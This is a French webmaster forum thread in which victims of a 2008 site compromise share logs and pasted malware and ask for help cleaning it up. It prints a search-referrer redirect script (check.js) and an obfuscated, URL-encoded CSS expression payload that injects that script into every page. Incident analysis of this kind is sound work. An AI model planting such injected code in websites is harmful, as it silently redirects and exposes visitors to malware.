Bonjour,
Votre opinion sur ce qui m'est arrivé?
Juste après avoir fait une mise à jour sur mon site avec FileZilla, je suis allé vérifier avec mon explorateur si tout allait bien: sage précaution.
Surprise: J'ai aussitôt été prévenu par Avast qu'un virus essayait de pénétrer mon ordinateur, et qu'il fallait cliquer sur sortir pour éviter d'être infecté.
Ce que j'ai fait. Apparemment, toutes les pages du site donnaient le même soucis.
5 minutes avant, c'est à dire avant la mise à jour, tout allait bien.
Me basant sur l'indication d'Avast, je suis allé voir avec FileZilla l'adresse indiquée sur mon site.
Et là, j'ai trouvé un répertoire ifax avec des fichiers dont check.js qui apparemment a provoqué le soucis.
Ce répertoire ifax, ce n'est pas moi qui l'ai transféré vers mon site, en tout cas pas volontairement. Il ne se trouve pas dans mes fichiers.
Evidemment, j'ai vite effacé ce répertoire ifax.
Ensuite, en retournant sur mon site avec l'explorateur, tout va bien de nouveau.
Voila. Qu'en pensez-vous?
Version complète: sur le forum Webmaster Hub : Virus détecté par Avast en allant sur mon propre site
Attention... c'est probablement le signe d'un serveur qui s'est fait cracker !
Regarde dans tes formulaires s'ils sont tous protégés, et recherche dans les logs d'apache !
Dan
Regarde dans tes formulaires s'ils sont tous protégés, et recherche dans les logs d'apache !
Dan
Salut,je pense également pareil que Dan.
Essaye de nous mettre le code source de ton fichier "check.js " voir ce qu'il si passe...
MeScHaC
Essaye de nous mettre le code source de ton fichier "check.js " voir ce qu'il si passe...
MeScHaC
A oui c'est exactement ce probleme la !
Alors en fouinant j'ai trouvé ca dans les logs !!
Ces lignes sont louches mais je comprend pa grand chose !!
et le code de check.js, toujours acompagné de dummy.htm et blog.htm, bah je l'ai pas sous la main car je viens de le supprimer, mais sans aucun doute dans 1h il est revenu
Alors en fouinant j'ai trouvé ca dans les logs !!
CODE
90.12.29.215 - - [04/Feb/2008:12:41:05 +0100] "GET /SoftBB/img/apevi/check.js HTTP/1.1" 200 1198 www.kartierwaste.fr "http://www.kartierwaste.fr/index.php?r=1&Largeur=800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
90.12.29.215 - - [04/Feb/2008:12:41:05 +0100] "GET /images/titre.jpg HTTP/1.1" 200 84494 www.kartierwaste.fr "http://www.kartierwaste.fr/index.php?r=1&Largeur=800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
90.12.29.215 - - [04/Feb/2008:12:41:05 +0100] "GET /SoftBB/img/apevi/dummy.htm?r=http%3A%2F%2Fimages.google.fr%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2Fwww.kartierwaste.fr%2Fimages%2Ftitre.jpg%26imgrefurl%3Dhttp%3A%2F%2Fwww.kartierwaste.fr%2F%26h%3D185%26w%3D1200%26sz%3D83%26hl%3Dfr%26start%3D1%26um%3D1%26tbnid%3DAq7-kjvALB_q4M%3A%26tbnh%3D23%26tbnw%3D150%26prev%3D%2Fimages%253Fq%253DKARTIER%252BWASTE%2526um%253D1%2526hl%253Dfr&s=161266 HTTP/1.1" 200 658 www.kartierwaste.fr "http://images.google.fr/imgres?imgurl=http://www.kartierwaste.fr/images/titre.jpg&imgrefurl=http://www.kartierwaste.fr/&h=185&w=1200&sz=83&hl=fr&start=1&um=1&tbnid=Aq7-kjvALB_q4M:&tbnh=23&tbnw=150&prev=/images%3Fq%3DKARTIER%2BWASTE%26um%3D1%26hl%3Dfr" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
90.12.29.215 - - [04/Feb/2008:12:41:05 +0100] "GET /SoftBB/img/apevi/blog.htm HTTP/1.1" 200 37058 www.kartierwaste.fr "http://www.kartierwaste.fr/SoftBB/img/apevi/dummy.htm?r=http%3A%2F%2Fimages.google.fr%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2Fwww.kartierwaste.fr%2Fimages%2Ftitre.jpg%26imgrefurl%3Dhttp%3A%2F%2Fwww.kartierwaste.fr%2F%26h%3D185%26w%3D1200%26sz%3D83%26hl%3Dfr%26start%3D1%26um%3D1%26tbnid%3DAq7-kjvALB_q4M%3A%26tbnh%3D23%26tbnw%3D150%26prev%3D%2Fimages%253Fq%253DKARTIER%252BWASTE%2526um%253D1%2526hl%253Dfr&s=161266" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
90.12.29.215 - - [04/Feb/2008:12:41:14 +0100] "GET / HTTP/1.1" 200 6500 www.kartierwaste.fr "http://images.google.fr/imgres?imgurl=http://www.kartierwaste.fr/images/titre.jpg&imgrefurl=http://www.kartierwaste.fr/&h=185&w=1200&sz=83&tbnid=Aq7-kjvALB_q4M:&tbnh=23&tbnw=150&hl=fr&um=1&prev=/images%3Fq%3DKARTIER%2BWASTE%26um%3D1%26hl%3Dfr&frame=small" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
90.12.29.215 - - [04/Feb/2008:12:41:05 +0100] "GET /images/titre.jpg HTTP/1.1" 200 84494 www.kartierwaste.fr "http://www.kartierwaste.fr/index.php?r=1&Largeur=800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
90.12.29.215 - - [04/Feb/2008:12:41:05 +0100] "GET /SoftBB/img/apevi/dummy.htm?r=http%3A%2F%2Fimages.google.fr%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2Fwww.kartierwaste.fr%2Fimages%2Ftitre.jpg%26imgrefurl%3Dhttp%3A%2F%2Fwww.kartierwaste.fr%2F%26h%3D185%26w%3D1200%26sz%3D83%26hl%3Dfr%26start%3D1%26um%3D1%26tbnid%3DAq7-kjvALB_q4M%3A%26tbnh%3D23%26tbnw%3D150%26prev%3D%2Fimages%253Fq%253DKARTIER%252BWASTE%2526um%253D1%2526hl%253Dfr&s=161266 HTTP/1.1" 200 658 www.kartierwaste.fr "http://images.google.fr/imgres?imgurl=http://www.kartierwaste.fr/images/titre.jpg&imgrefurl=http://www.kartierwaste.fr/&h=185&w=1200&sz=83&hl=fr&start=1&um=1&tbnid=Aq7-kjvALB_q4M:&tbnh=23&tbnw=150&prev=/images%3Fq%3DKARTIER%2BWASTE%26um%3D1%26hl%3Dfr" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
90.12.29.215 - - [04/Feb/2008:12:41:05 +0100] "GET /SoftBB/img/apevi/blog.htm HTTP/1.1" 200 37058 www.kartierwaste.fr "http://www.kartierwaste.fr/SoftBB/img/apevi/dummy.htm?r=http%3A%2F%2Fimages.google.fr%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2Fwww.kartierwaste.fr%2Fimages%2Ftitre.jpg%26imgrefurl%3Dhttp%3A%2F%2Fwww.kartierwaste.fr%2F%26h%3D185%26w%3D1200%26sz%3D83%26hl%3Dfr%26start%3D1%26um%3D1%26tbnid%3DAq7-kjvALB_q4M%3A%26tbnh%3D23%26tbnw%3D150%26prev%3D%2Fimages%253Fq%253DKARTIER%252BWASTE%2526um%253D1%2526hl%253Dfr&s=161266" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
90.12.29.215 - - [04/Feb/2008:12:41:14 +0100] "GET / HTTP/1.1" 200 6500 www.kartierwaste.fr "http://images.google.fr/imgres?imgurl=http://www.kartierwaste.fr/images/titre.jpg&imgrefurl=http://www.kartierwaste.fr/&h=185&w=1200&sz=83&tbnid=Aq7-kjvALB_q4M:&tbnh=23&tbnw=150&hl=fr&um=1&prev=/images%3Fq%3DKARTIER%2BWASTE%26um%3D1%26hl%3Dfr&frame=small" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-"
Ces lignes sont louches mais je comprend pa grand chose !!
et le code de check.js, toujours acompagné de dummy.htm et blog.htm, bah je l'ai pas sous la main car je viens de le supprimer, mais sans aucun doute dans 1h il est revenu
voila check.js :
eet voila ce qu'on retrouve dans tous les .css et .js du site:
CODE
if ( (Math.random()*60 < JSS1) && document.referrer.match(/^http:\/\/([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearc h|yandex|rambler|aport|mail|gogo|poisk|alltheweb|f ireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|cl ix|terravista|gratis-ting|suomi24)\./) && document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keyword s|search_string|search_word|buscar|text|words|su|q t|rdata)\=/) && !document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keyword s|search_string|search_word|buscar|text|words|su|q t|rdata)\=[^&]+(%3A|%22)/) ){
location.href=JSS3+'?r='+encodeURIComponent(docume nt.referrer)+'&s='+JSS2;
};
location.href=JSS3+'?r='+encodeURIComponent(docume nt.referrer)+'&s='+JSS2;
};
eet voila ce qu'on retrouve dans tous les .css et .js du site:
CODE
/* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63 %75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%4 2%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53% 53%31%20%3D%20%35%34%3B%20%4A%53%53%32%20%3D%20%31 %35%39%38%30%36%3B%20%4A%53%53%33%20%3D%20%27%2F%7 3%63%61%64%6D%69%6E%2F%63%6D%73%2F%69%6D%61%67%65% 73%2F%69%73%61%62%69%66%2F%64%75%6D%6D%79%2E%68%74 %6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%7 5%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65% 6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E %73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%6 3%27%2C%20%27%2F%73%63%61%64%6D%69%6E%2F%63%6D%73% 2F%69%6D%61%67%65%73%2F%69%73%61%62%69%66%2F%63%68 %65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%4 1%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27% 4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E %67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4 E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D% 28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A %73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */
dans les logs Apache, fais une recherche de ce genre :
Dans le cas d'une injection SQL, c'est ce qu'on retrouve le plus souvent. Cela permettra de voir si le "hacker" est passé par là (je ne pense pas mais bon...)
CODE
zgrep -i '%20or%20' access*
Dans le cas d'une injection SQL, c'est ce qu'on retrouve le plus souvent. Cela permettra de voir si le "hacker" est passé par là (je ne pense pas mais bon...)
Bonjour,
J'ai le même problème,
Avast me détecte un virus Check.js dans un dossier du site, lorsque je supprime ce dossier il revient.
Moi c'est une page perso de free, je ne pense donc pas avoir accès au log d'Apache.
Je pense peut être que le hacker a utiliser les inclusions de fichier PHP du style index.php?page=mapage.php mais je n'en suis pas sur du tout.
J'ai le même problème,
Avast me détecte un virus Check.js dans un dossier du site, lorsque je supprime ce dossier il revient.
Moi c'est une page perso de free, je ne pense donc pas avoir accès au log d'Apache.
Je pense peut être que le hacker a utiliser les inclusions de fichier PHP du style index.php?page=mapage.php mais je n'en suis pas sur du tout.
Rien du tout avec ta commande Kioob, merci quand meme !
Je continu a chercher !
Je continu a chercher !
Un ptit indice en plus, j'e trouve toujours ca à la fin du code de mon site !!!
Qu'est ce que c'est qu ça ??
CODE
<!--
2function __RP_Callback_Helper(str, strCallbackEvent, splitSize, func){var event = null;if (strCallbackEvent){event = document.createEvent('Events');event.initEvent(strCallbackEvent, true, true);}if (str && str.length > 0){var splitList = str.split('|');var strCompare = str;if (splitList.length == splitSize)strCompare = splitList[splitSize-1];var pluginList = document.plugins;for (var count = 0; count < pluginList.length; count++){var sSrc = '';if (pluginList[count] && pluginList[count].src)sSrc = pluginList[count].src;if (strCompare.length >= sSrc.length){if (strCompare.indexOf(sSrc) != -1){func(str, count, pluginList, splitList);break;}}}}if (strCallbackEvent)document.body.dispatchEvent(event);}function __RP_Coord_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Coord_Callback = str;pluginList[index].__RP_Coord_Callback_Left = splitList[0];pluginList[index].__RP_Coord_Callback_Top = splitList[1];pluginList[index].__RP_Coord_Callback_Right = splitList[2];pluginList[index].__RP_Coord_Callback_Bottom = splitList[3];};__RP_Callback_Helper(str, 'rp-js-coord-callback', 5, func);}function __RP_Url_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Url_Callback = str;pluginList[index].__RP_Url_Callback_Vid = splitList[0];pluginList[index].__RP_Url_Callback_Parent = splitList[1];};__RP_Callback_Helper(str, 'rp-js-url-callback', 3, func);}function __RP_TotalBytes_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_TotalBytes_Callback = str;pluginList[index].__RP_TotalBytes_Callback_Bytes = splitList[0];};__RP_Callback_Helper(str, null, 2, func);}function __RP_Connection_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Connection_Callback = str;pluginList[index].__RP_Connection_Callback_Url = splitList[0];};__RP_Callback_Helper(str, null, 2, func);}
3//-->
</script>
2function __RP_Callback_Helper(str, strCallbackEvent, splitSize, func){var event = null;if (strCallbackEvent){event = document.createEvent('Events');event.initEvent(strCallbackEvent, true, true);}if (str && str.length > 0){var splitList = str.split('|');var strCompare = str;if (splitList.length == splitSize)strCompare = splitList[splitSize-1];var pluginList = document.plugins;for (var count = 0; count < pluginList.length; count++){var sSrc = '';if (pluginList[count] && pluginList[count].src)sSrc = pluginList[count].src;if (strCompare.length >= sSrc.length){if (strCompare.indexOf(sSrc) != -1){func(str, count, pluginList, splitList);break;}}}}if (strCallbackEvent)document.body.dispatchEvent(event);}function __RP_Coord_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Coord_Callback = str;pluginList[index].__RP_Coord_Callback_Left = splitList[0];pluginList[index].__RP_Coord_Callback_Top = splitList[1];pluginList[index].__RP_Coord_Callback_Right = splitList[2];pluginList[index].__RP_Coord_Callback_Bottom = splitList[3];};__RP_Callback_Helper(str, 'rp-js-coord-callback', 5, func);}function __RP_Url_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Url_Callback = str;pluginList[index].__RP_Url_Callback_Vid = splitList[0];pluginList[index].__RP_Url_Callback_Parent = splitList[1];};__RP_Callback_Helper(str, 'rp-js-url-callback', 3, func);}function __RP_TotalBytes_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_TotalBytes_Callback = str;pluginList[index].__RP_TotalBytes_Callback_Bytes = splitList[0];};__RP_Callback_Helper(str, null, 2, func);}function __RP_Connection_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Connection_Callback = str;pluginList[index].__RP_Connection_Callback_Url = splitList[0];};__RP_Callback_Helper(str, null, 2, func);}
3//-->
</script>
Qu'est ce que c'est qu ça ??
Quand je fait un URLDecode de ton Css je trouve ça :
Je voudrais bien savoir ce qu'il y as dans la page "isabif/dummy.htm"
CODE
body { margin-top: expression(eval(unescape('if (!doc ument.getElement%4 2yId('JSSS')){ JS% 531 = 54; JSS2 = 1 59806; JSS3 = '/%7 3cadmin/cms/image% 73/isabif/dummy.ht m'; var js = doc%7 5ment.createEleme% 6Et('script'); js. setAttribute('sr%6 3', '/scadmin/cms% 2Fimages/isabif/ch eck.js'); js.set%4 1ttribute('id', '% 4ASSS'); document. getElementsByTag%4 Eame('head').item% 280).appendChild(j s) }; '))) }
Je voudrais bien savoir ce qu'il y as dans la page "isabif/dummy.htm"
Malheureusement, je ne peux pas te le dire pour l'instant puisque j'ai viré ces fichiers.
Mais sans nul doute, ils reviendront dans quelques heures !!
Je sais pas quoi faire !
Mais sans nul doute, ils reviendront dans quelques heures !!
Je sais pas quoi faire !
CITATION(raphio000 @ mercredi 5 mars 2008 à 14:53) 
Malheureusement, je ne peux pas te le dire pour l'instant puisque j'ai viré ces fichiers.
Mais sans nul doute, ils reviendront dans quelques heures !!
Je sais pas quoi faire !
Mais sans nul doute, ils reviendront dans quelques heures !!
Je sais pas quoi faire !
Tu as un antivirus sur ton serveur ou un anti-rootkit ?
Tu atttend voir si les fichiers reviennent et s'il revienne tu nous montre le source des pages bizarres...
Essaye de voir si tu ne trouve pas sur ton serveur des fichiers php qui ne sont pas les tiens ou qui on une taille assez importante...
c'est un serveur mutualisé donc je n'ai pas la main sur un antivirus...
Je vous enverrais les sources des qu'ils reviennent !!
Tous les ficheirs php sur le serveur sont les miens.
J'ai un autre probleme qui est surement en relation :
Depuis le début de ce probleme, j'ai un probleme de header
Alors que ma page index.php commencent ainsi
et ma page entetehtml.php ainsi :
ce qui logiquement est correct
mais il gueule comme si j'avais laissé un blanc devant ma session ou mon header !
J'en ai trop marre
Je vous enverrais les sources des qu'ils reviennent !!
Tous les ficheirs php sur le serveur sont les miens.
J'ai un autre probleme qui est surement en relation :
Depuis le début de ce probleme, j'ai un probleme de header
CODE
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/38/d213986949/htdocs/index.php:1) in /homepages/38/d213986949/htdocs/entetehtml.php on line 2
Alors que ma page index.php commencent ainsi
CODE
<?php
include("entetehtml.php");
//panneau de gauche
echo'<div class="floatLeft">';
include("entetehtml.php");
//panneau de gauche
echo'<div class="floatLeft">';
et ma page entetehtml.php ainsi :
CODE
<?php
session_start();
require_once('fonctions.php');
session_start();
require_once('fonctions.php');
ce qui logiquement est correct
mais il gueule comme si j'avais laissé un blanc devant ma session ou mon header !
J'en ai trop marre
Alors on dirait que raphio000 a les mêmes soucis que moi.
Ce que vous avez bien deviné, c'est que ça recommencerait.
J'ai de nouveau effacé le répertoire-qui-gêne.
Je n'ose pas transférer ce répertoire ifax sur mon PC. Quand on voit le diable, on hésite à lui serrer la main...
Par contre, j'ai repéré 2 fichier .php dans d'autre répertoires (je fais l'inventaire)
Ces fichiers, je les ai chargés et j'ai changé l'extension en .txt pour voir, mais, bien sûr, on ne voit rien.
Ce que vous avez bien deviné, c'est que ça recommencerait.
J'ai de nouveau effacé le répertoire-qui-gêne.
Je n'ose pas transférer ce répertoire ifax sur mon PC. Quand on voit le diable, on hésite à lui serrer la main...
Par contre, j'ai repéré 2 fichier .php dans d'autre répertoires (je fais l'inventaire)
Ces fichiers, je les ai chargés et j'ai changé l'extension en .txt pour voir, mais, bien sûr, on ne voit rien.
CITATION(yack45 @ mercredi 5 mars 2008 à 15:30)
Ces fichiers, je les ai chargés et j'ai changé l'extension en .txt pour voir, mais, bien sûr, on ne voit rien.
Y'as quoi dans les fichiers php ?
En me basant sur ce que dit raphio000, j'ai regardé de près les .css, et j'ai remarqué qu'ils sont plus volumineux qu'à l'origine. Donc je les ai rechargés.
J'ai aussi détecté d'autres fichiers .php que j'ai détruits.
D'autre part, j'ai alerté mon hébergeur, qui n'a rien trouvé d'anormal de son côté. Il me conseille lui aussi de partir en chasse de la faille de sécurité chez moi.
J'en profite pour me présenter:
J'ai bientôt 63 ans, j'ai créé mon premier site à 59 ans quand je me suis retrouvé au chômage (j'étais électronicien). L'idée était de faire un site de photos, ce que j'ai fait.
Puis je me suis intéressé aux techniques du web pour en venir à d'autres sites dont un qui comporte un forum phpBB2 et toutes les pages en php. C'est sur ce site qu'il y a des soucis. Je suis donc devenu un "webmaster amateur" alors que je voulais devenir "photographe amateur".
C'est seulement ce matin que j'ai découvert votre forum qui me plaît bien, car je le trouve nettement plus "pro" que ceux que j'ai eu l'occasion de voir jusqu'à maintenant.
Concernant cette faille de sécurité, si j'ai bien compris, il faut chercher les formulaires non protégés: Si quelqu'un pouvait me lancer sur la bonne piste, ce serait bien.
Dans les fichiers .php, je ne vois rien! C'est page blanche.
C'est comme dans les .css qui ont augmenté de taille: je ne vois rien de plus que mon code, sauf des tas de lignes blanches en bas de page. (avec l'éditeur php)
Et encore une chose pas sympa: je viens de découvrir un .htaccess à la racine de mon site!
J'ai aussi détecté d'autres fichiers .php que j'ai détruits.
D'autre part, j'ai alerté mon hébergeur, qui n'a rien trouvé d'anormal de son côté. Il me conseille lui aussi de partir en chasse de la faille de sécurité chez moi.
J'en profite pour me présenter:
J'ai bientôt 63 ans, j'ai créé mon premier site à 59 ans quand je me suis retrouvé au chômage (j'étais électronicien). L'idée était de faire un site de photos, ce que j'ai fait.
Puis je me suis intéressé aux techniques du web pour en venir à d'autres sites dont un qui comporte un forum phpBB2 et toutes les pages en php. C'est sur ce site qu'il y a des soucis. Je suis donc devenu un "webmaster amateur" alors que je voulais devenir "photographe amateur".
C'est seulement ce matin que j'ai découvert votre forum qui me plaît bien, car je le trouve nettement plus "pro" que ceux que j'ai eu l'occasion de voir jusqu'à maintenant.
Concernant cette faille de sécurité, si j'ai bien compris, il faut chercher les formulaires non protégés: Si quelqu'un pouvait me lancer sur la bonne piste, ce serait bien.
Dans les fichiers .php, je ne vois rien! C'est page blanche.
C'est comme dans les .css qui ont augmenté de taille: je ne vois rien de plus que mon code, sauf des tas de lignes blanches en bas de page. (avec l'éditeur php)
Et encore une chose pas sympa: je viens de découvrir un .htaccess à la racine de mon site!
Si les visiteurs ne peuvent télécharger de fichier directement sur ton site, et toi non plus via php, le mieux à faire est d'effacer tous les répertoires et fichiers distants, de changer le mot de passe ftp et d'uploader la totalité des scripts.
Personnellement je downloaderais les fichiers distants pour comparer avec ceux en local sur ton pc, ça permettra de voir ceux qui ont été ajoutés ou modifiés
En attendant de connaitre l'origine de la faille, désactiver les formulaires de saisies et autres moyens d'interaction.
Vérifie aussi la bdd mysql, on ne sait jamais
Personnellement je downloaderais les fichiers distants pour comparer avec ceux en local sur ton pc, ça permettra de voir ceux qui ont été ajoutés ou modifiés
En attendant de connaitre l'origine de la faille, désactiver les formulaires de saisies et autres moyens d'interaction.
Vérifie aussi la bdd mysql, on ne sait jamais
Ce que j'aimerais faire, c'est traiter l'origine de la faille:
J'ai fait l'inventaire de ce qui pourrait être à l'origine d'un faille.
Donc j'ai des questions car je ne comprends pas bien les méthodes des attaques.
1) J'ai lu partout que les GET ont mauvaise réputation. Je les utilise pour appeler des pages. Si le numéro est détourné, une page de même nom mais au numéro différent sera appelée et je ne vois pas quel problème ça occasionne. Quelqu'un pourrait-il m'expliquer?
Je viens d'ajouter des htmlentities là où ça craignait, ça ne peut pas faire de mal. Peut-être que c'était le problème.
2) J'ai un traitement de cookie. Est-ce que ça peut venir de là?
3) J'ai un forum phpBB2 que j'ai mis à jour hier avec la dernière version sortie la semaine dernière. Est ce que ça peut venir de là?
4) J'ai un soucis d'un autre ordre: si je vous donne le nom du site, ce qui serait utile, mes clients vont vite se sauver en croyant qu'il peuvent prendre un virus, car une recherche sur Google aurait tôt fait de leur révéler le problème. Comment faut-il faire?
Merci.
J'ai fait l'inventaire de ce qui pourrait être à l'origine d'un faille.
Donc j'ai des questions car je ne comprends pas bien les méthodes des attaques.
1) J'ai lu partout que les GET ont mauvaise réputation. Je les utilise pour appeler des pages. Si le numéro est détourné, une page de même nom mais au numéro différent sera appelée et je ne vois pas quel problème ça occasionne. Quelqu'un pourrait-il m'expliquer?
Je viens d'ajouter des htmlentities là où ça craignait, ça ne peut pas faire de mal. Peut-être que c'était le problème.
2) J'ai un traitement de cookie. Est-ce que ça peut venir de là?
3) J'ai un forum phpBB2 que j'ai mis à jour hier avec la dernière version sortie la semaine dernière. Est ce que ça peut venir de là?
4) J'ai un soucis d'un autre ordre: si je vous donne le nom du site, ce qui serait utile, mes clients vont vite se sauver en croyant qu'il peuvent prendre un virus, car une recherche sur Google aurait tôt fait de leur révéler le problème. Comment faut-il faire?
Merci.
ce qui pose problème avec les get, c'est des url du genre www.example.com/index.php?page=http://www.example.com/monscript.php
si page ne prend que des valeurs prédéfinies sur ton serveur local,
ensuite, autre possibilité : les upload d'image ou autres fichiers qui pourraient, en fait, contenir des scripts si tu ne les vérifies pas. J'upload une photo (en fait un script php ou perl ou cgi) tes scripts copient mon fichier dans un répertoire accessible en http directement et je peux ensuite le faire exécuter
si page ne prend que des valeurs prédéfinies sur ton serveur local,
ensuite, autre possibilité : les upload d'image ou autres fichiers qui pourraient, en fait, contenir des scripts si tu ne les vérifies pas. J'upload une photo (en fait un script php ou perl ou cgi) tes scripts copient mon fichier dans un répertoire accessible en http directement et je peux ensuite le faire exécuter
Merci pour ta réponse claire.
J'ai soigneusement évité les uploads de photos.
Ce que j'ai c'est ça:
mapage.php?id=401
ou ça:
autrepage.php#05
Donc, comme il faut bien que ça soit passé par quelque part, je vais chercher ailleurs. Peut-être par le forum phpBB?
Il y a 3 mois, j'ai eu un message en anglais qui me disait en gros: si tu effaces mon post, je détruirais tout ton site
Bien sûr, j'ai effacé et serré les dents pendant quelques jours. Il a mis le temps!
J'ai soigneusement évité les uploads de photos.
Ce que j'ai c'est ça:
mapage.php?id=401
ou ça:
autrepage.php#05
Donc, comme il faut bien que ça soit passé par quelque part, je vais chercher ailleurs. Peut-être par le forum phpBB?
Il y a 3 mois, j'ai eu un message en anglais qui me disait en gros: si tu effaces mon post, je détruirais tout ton site
Bien sûr, j'ai effacé et serré les dents pendant quelques jours. Il a mis le temps!
je n'avais pas tout lu avant de répondre au MP.
1) la dernière version de phpbb a-t-elle été récupérée sur le site officiel ?
2) tous les scripts d'installation et/ou de màj ont-ils été supprimés après l'install ?
3) n'y a-t-il pas des protections à mettre sur certains répertoires ?
4) les passwords ne sont-ils pas trop évidents à trouver ?
1) la dernière version de phpbb a-t-elle été récupérée sur le site officiel ?
2) tous les scripts d'installation et/ou de màj ont-ils été supprimés après l'install ?
3) n'y a-t-il pas des protections à mettre sur certains répertoires ?
4) les passwords ne sont-ils pas trop évidents à trouver ?
Merci pour tes interventions.
Concernant phpBB, j'ai fait tout ce qu'il faut faire, et que tu listes.
La seule chose que je puisse me reprocher, c'est d'avoir fait la mise à jour une semaine après sa sortie au lieu de la faire tout de suite.
Selon leur date, les fichiers php ajoutés à mon site ont été introduits la veille de cette mise à jour, et l'effet de l'attaque s'est révélé 3 jours après.
Concernant phpBB, j'ai fait tout ce qu'il faut faire, et que tu listes.
La seule chose que je puisse me reprocher, c'est d'avoir fait la mise à jour une semaine après sa sortie au lieu de la faire tout de suite.
Selon leur date, les fichiers php ajoutés à mon site ont été introduits la veille de cette mise à jour, et l'effet de l'attaque s'est révélé 3 jours après.
et ça correspond bien au type d'attaque que la màj permettait d'éviter ?
Si oui, maintenant que tu sais d'où ça vient, purge complète du site sur le serveur et re upload des sources
Si oui, maintenant que tu sais d'où ça vient, purge complète du site sur le serveur et re upload des sources
Il y a une liste de modif correspondantes à cette mise à jour (2.0.23):
[Fix] Correctly re-assign group moderator on user deletion (Bug #280)
[Fix] Deleting a forum with multiple polls included (Bug #6740)
[Fix] Fixed postgresql query for obtaining group moderator in groupcp.php (Bug #6550)
[Fix] Selected field on first entry by default for font size within posting_body.tpl (Bug #7124)
[Fix] Adjusted maxlength parameters in admin/styles_edit_body.tpl (Bug #81)
[Fix] Fixed html output in make_forum_select if no forums present (Bug #436)
[Fix] Fixed spelling error(s) in lang_admin.php (Bug #7172, #6978)
[Fix] Correctly display censored words in admin panel (Bug #12271)
[Fix] Do not allow soft hyphen \xAD in usernames (reported by Bander00)
[Fix] Fixed the group permission system's use of array access
[Fix] Simple group permissions now work properly
[Fix] Fix inability to export smilies (Bug #2265)
[Fix] Fixing some problems with PHP5 and register_long_arrays off
[Sec] Fix possible XSRF Vulnerability in private messaging and groups handling
La dernière correspond bien à un problème de vulnérabilité, mais on n'a pas plus de détails.
Donc je ne suis pas du tout certain que le problème soit venu de là. Je vais me renseigner dans leur forum.
[Fix] Correctly re-assign group moderator on user deletion (Bug #280)
[Fix] Deleting a forum with multiple polls included (Bug #6740)
[Fix] Fixed postgresql query for obtaining group moderator in groupcp.php (Bug #6550)
[Fix] Selected field on first entry by default for font size within posting_body.tpl (Bug #7124)
[Fix] Adjusted maxlength parameters in admin/styles_edit_body.tpl (Bug #81)
[Fix] Fixed html output in make_forum_select if no forums present (Bug #436)
[Fix] Fixed spelling error(s) in lang_admin.php (Bug #7172, #6978)
[Fix] Correctly display censored words in admin panel (Bug #12271)
[Fix] Do not allow soft hyphen \xAD in usernames (reported by Bander00)
[Fix] Fixed the group permission system's use of array access
[Fix] Simple group permissions now work properly
[Fix] Fix inability to export smilies (Bug #2265)
[Fix] Fixing some problems with PHP5 and register_long_arrays off
[Sec] Fix possible XSRF Vulnerability in private messaging and groups handling
La dernière correspond bien à un problème de vulnérabilité, mais on n'a pas plus de détails.
Donc je ne suis pas du tout certain que le problème soit venu de là. Je vais me renseigner dans leur forum.
CITATION(Leonick @ jeudi 6 mars 2008 à 08:56)
et ça correspond bien au type d'attaque que la màj permettait d'éviter ?
Si oui, maintenant que tu sais d'où ça vient, purge complète du site sur le serveur et re upload des sources
Si oui, maintenant que tu sais d'où ça vient, purge complète du site sur le serveur et re upload des sources
La derniere version de phpbb est assez light. Il s'agit surtout de fix.
Il y a une correction de securité qui supprime la possibilité de supprimer tous les messages privés d'un membre en envoyant un message privé contenant un code si on clique sur un lien. J'ecarterais cette faille comme cause de ton probleme.
On parle parfois de problèmes de sécurité sur les "include".
Si j'ai bien compris, ça pose un problème seulement quand cette commande passe par un GET ou un POST ?
Mes include sont de la forme:
include("fichier.inc.php");
Et voici un fichier inclus qui permet le changement de langue:
Est ce que ça vous paraît correct?
Si j'ai bien compris, ça pose un problème seulement quand cette commande passe par un GET ou un POST ?
Mes include sont de la forme:
include("fichier.inc.php");
Et voici un fichier inclus qui permet le changement de langue:
